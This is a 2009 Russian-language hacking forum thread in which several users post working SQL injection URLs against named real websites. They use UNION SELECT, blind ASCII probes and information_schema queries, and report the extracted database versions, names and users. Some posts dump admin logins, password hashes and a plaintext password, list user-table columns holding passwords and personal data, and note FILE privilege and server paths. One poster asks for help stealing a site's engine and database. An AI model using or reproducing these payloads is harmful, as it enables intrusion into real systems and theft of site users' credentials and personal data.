ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8061  
Старый 28.02.2009, 19:01
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.folieanticondens.ro/index.php?page=prod&lang=ro&prod=20+AND+ASCII(SUBS TRING((select+version()),1,1))>x--

x=53,46,48,46,54,55,45,99,111,109,109,117,110,105, 116,121,45,108,111,103


http://www.folieanticondens.ro/index.php?page=prod&lang=ro&prod=20+AND+ASCII(SUBS TRING((select+database()),1,1))>x--


x=102,105,110,97,108,100,95,102,111,108,105,101



http://www.folieanticondens.ro/index.php?page=prod&lang=ro&prod=20+AND+ASCII(SUBS TRING((select+user()),1,1))>x--


x=102,105,110,97,108,100,95,97,100,109,105,110,64, 108,111,99,97,108,104,111,115,116





Version : 5.0.67-community-log
Database : finald_folie
User : finald_admin@localhost
 
Ответить с цитированием

  #8062  
Старый 28.02.2009, 21:45
Аватар для dr.Pilulkin
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

http://www.eleven.co.il/print.php?id=-10591+union+select+1,2,3,4,5,6,7,8,9,user()--
eleven@localhost
5.0.77
elevenart
/var/db/mysql/

http://www.eastrovedica.in/article.php?id=12317+order+by+17--&act=print

wisdoma_indiart@localhost
5.1.30
portbld-freebsd7.1
 
Ответить с цитированием

  #8063  
Старый 28.02.2009, 21:53
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.ircolours.ro/index.php?view=product&id=-32+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17



Database Version: 5.0.67-community-log
Database name: ircolour_ircolours
User name: ircolour_webagen@localhost
 
Ответить с цитированием

  #8064  
Старый 28.02.2009, 22:09
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

bugeisha.ru PR-4 ТиЦ 650 вывод в сурсе страницы(в <input type="hidden")
PHP код:
http://bugeisha.ru/aikido/aikido/post.php3?topic_id=-1+union+select+1,2,3,4,concat(0x27203e3c62723e,user(),0x3A,version(),0x3a,database(),0x3c212d2d2d2d)+--+ 
интересные колонки:
Цитата:
bugeisha_db.chat_users=>nick
bugeisha_db.chat_users=>passwd
bugeisha_db.chat_users=>real_name
bugeisha_db.chat_users=>city
bugeisha_db.chat_users=>age
bugeisha_db.chat_users=>email
bugeisha_db.chat_users=>icq
bugeisha_db.chat_users=>yahoo
bugeisha_db.chat_users=>phone
bugeisha_db.chat_users=>homepage
bugeisha_db.chat_users=>biography
bugeisha_db.chat_users=>hobby
bugeisha_db.chat_users=>links
bugeisha_db.chat_users=>about
bugeisha_db.chat_users=>disable
bugeisha_db.chat_users=>logged_in
bugeisha_db.chat_users=>admin
bugeisha_db.chat_users=>msg_len
bugeisha_db.chat_users=>refresh
bugeisha_db.chat_users=>last_time
bugeisha_db.chat_users=>host
bugeisha_db.chat_users=>last_private
bugeisha_db.chat_users=>ignore_hosts
bugeisha_db.chat_users=>photo
bugeisha_db.chat_users=>regdate
bugeisha_db.chat_users=>gallery
bugeisha_db.chat_users=>history
bugeisha_db.chat_users=>last_post
bugeisha_db.chat_users2=>nick
bugeisha_db.chat_users2=>passwd
bugeisha_db.chat_users2=>real_name
bugeisha_db.chat_users2=>city
bugeisha_db.chat_users2=>age
bugeisha_db.chat_users2=>email
bugeisha_db.chat_users2=>icq
bugeisha_db.chat_users2=>yahoo
bugeisha_db.chat_users2=>phone
bugeisha_db.chat_users2=>homepage
bugeisha_db.chat_users2=>biography
bugeisha_db.chat_users2=>hobby
bugeisha_db.chat_users2=>links
bugeisha_db.chat_users2=>about
bugeisha_db.chat_users2=>disable
bugeisha_db.chat_users2=>logged_in
bugeisha_db.chat_users2=>admin
bugeisha_db.chat_users2=>msg_len
bugeisha_db.chat_users2=>refresh
bugeisha_db.chat_users2=>last_time
bugeisha_db.chat_users2=>host
bugeisha_db.chat_users2=>last_private
bugeisha_db.chat_users2=>ignore_hosts
bugeisha_db.chat_users2=>photo
bugeisha_db.chat_users2=>regdate
bugeisha_db.chat_users2=>gallery
bugeisha_db.chat_users2=>history
bugeisha_db.chat_users2=>last_post
.................................................. ..........
bugeisha_db.h2_chat_users=>nick
bugeisha_db.h2_chat_users=>passwd
bugeisha_db.h2_chat_users=>real_name
bugeisha_db.h2_chat_users=>city
bugeisha_db.h2_chat_users=>age
bugeisha_db.h2_chat_users=>email
bugeisha_db.h2_chat_users=>icq
bugeisha_db.h2_chat_users=>yahoo
bugeisha_db.h2_chat_users=>phone
bugeisha_db.h2_chat_users=>homepage
bugeisha_db.h2_chat_users=>biography
bugeisha_db.h2_chat_users=>hobby
bugeisha_db.h2_chat_users=>links
bugeisha_db.h2_chat_users=>about
bugeisha_db.h2_chat_users=>disable
bugeisha_db.h2_chat_users=>logged_in
bugeisha_db.h2_chat_users=>admin
bugeisha_db.h2_chat_users=>msg_len
bugeisha_db.h2_chat_users=>refresh
bugeisha_db.h2_chat_users=>last_time
bugeisha_db.h2_chat_users=>host
bugeisha_db.h2_chat_users=>last_private
bugeisha_db.h2_chat_users=>ignore_hosts
bugeisha_db.h2_chat_users=>photo
bugeisha_db.h2_chat_users=>regdate
bugeisha_db.h2_chat_users=>gallery
bugeisha_db.h2_chat_users=>history
bugeisha_db.h2_chat_users=>last_post
.................................................. ................
bugeisha_db.users=>us_id
bugeisha_db.users=>login
bugeisha_db.users=>email
bugeisha_db.users=>passwd
bugeisha_db.users=>org
bugeisha_db.users=>url
bugeisha_db.users=>moderator
bugeisha_db.users=>dob
bugeisha_db.users=>army
bugeisha_db.users=>rodzanyatiy
bugeisha_db.users=>family
bugeisha_db.users=>sudimosti
bugeisha_db.users=>wear
bugeisha_db.users=>community
bugeisha_db.users=>likefilms
bugeisha_db.users=>likemusic
bugeisha_db.users=>likebooks
bugeisha_db.users=>watch
bugeisha_db.users=>cars
bugeisha_db.users=>motto
bugeisha_db.users=>reader
bugeisha_db.users=>r_name

Последний раз редактировалось AkyHa_MaTaTa; 28.02.2009 в 22:41..
 
Ответить с цитированием

  #8065  
Старый 28.02.2009, 22:11
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.artmobila.md/index.php?section=news&id=-1234271747+union+select+1,concat_ws(0x3a,version() ,database(),user()),3&lang=ru



Database Version: 5.0.51
Database name: artmobil_artmobila
User name: artmobil_site@localhost
 
Ответить с цитированием

  #8066  
Старый 28.02.2009, 22:43
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Автоэкзотика
Pagerank: 5
тИЦ: 600


Код:
http://www.autoexotica.ru/news/?nid=1+union+select+1,concat _ws(0x3a,versio n(),database(),user()),3,4,5,6,7,8,9,10,11--
Database Version : 5.0.45
Database name : autoexotica
User name : autoexoticaru@localhost


юзеры выводятся без лимита:

Код:
http://www.autoexotica.ru/news/?nid=1+union+select+1,conca t_ws(0x3a,name,member_login_key),3,4,5,6,7,8,9,10,11+from+ibf_members--
админ:

Код:
autoexotica:3bceae1f772c17b075b311e2a6eacb8b

---------------------------------------------------------#


Pagerank: 3
тИЦ: 250

Код:
http://www.vw-club.ru/vw/news/show_news.php?id=-1+union+select+1,concat_ ws(0x3a,version() ,database(),user()),3,4,5,6--

Database Version : 4.1.21-log
Database name : rds_vwclub
User name : rds_vwclub@localhost
 
Ответить с цитированием

  #8067  
Старый 28.02.2009, 23:14
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.naturalwoodfloor.ro/parchet_specificatii.php?id=-36+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6



Database Version: 5.0.67-community-log
Database name: naturalw_db
User name: naturalw_acces@localhost
 
Ответить с цитированием

  #8068  
Старый 01.03.2009, 02:33
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
www.magnet.ru
PR: 4
Тиц: 180
Версия: 5.0.51a-log
База данных: magnetru
Юзверь: alex192@192.168.0.80
Код:
http://magnet.ru/news.php?nid=2131231%20union%20select%201,concat(password,0x3a,user),3,4,5%20from%20mysql.user%20limit%201,1--
Логин: alex
Пароль: *676243218923905CF94CB52A3C9D3EB30CE8E20D

PS: File priv = Y

/usr/local/www/client/magnet.ru/www/
Путь =))
Дальше думаю сами курите че можно сделать -)

Последний раз редактировалось Assembler; 01.03.2009 в 02:43..
 
Ответить с цитированием

  #8069  
Старый 01.03.2009, 02:33
Аватар для RaDDeaD
RaDDeaD
Познающий
Регистрация: 28.12.2006
Сообщений: 44
Провел на форуме:
119257

Репутация: 56
По умолчанию

http://www.formul.ru

ВНИМАНИЕ, Мнеб слить движок их желательно каэшн прям с базой)...
Прошу помощи в осуществлении))
В Личку
Админка: http://www.formul.ru/admin/

Нарыл это:
http://www.formul.ru/index.php?cat_id=-1'+union+select+1,2,3,4,5,6,column_name,8,9,0,10,1 1,12,13,14,15,16,17,18,19,20+CPU_USER+from+informa tion_schema.columns/*
 
Ответить с цитированием

  #8070  
Старый 01.03.2009, 03:05
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://trubotorg33.ru
PR: 1
Тиц: 0
Версия: 5.0.75
База данных: trt
Юзверь: root@localhost
Код:
http://www.trubotorg33.ru/index.php?id=12&nid=1342343%20union%20select%201,2,3,concat_ws(0x3a,id,name,passw),5,6,7,8,9%20from%20users--
Админка: Ненашел =(
Логин: adm
Пароль: 110001

Есть доступ к mysql.user
File Priv = Y =)
/home/edu/data/www/trubotorg33.ru/class/
Че то седня фортит=)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ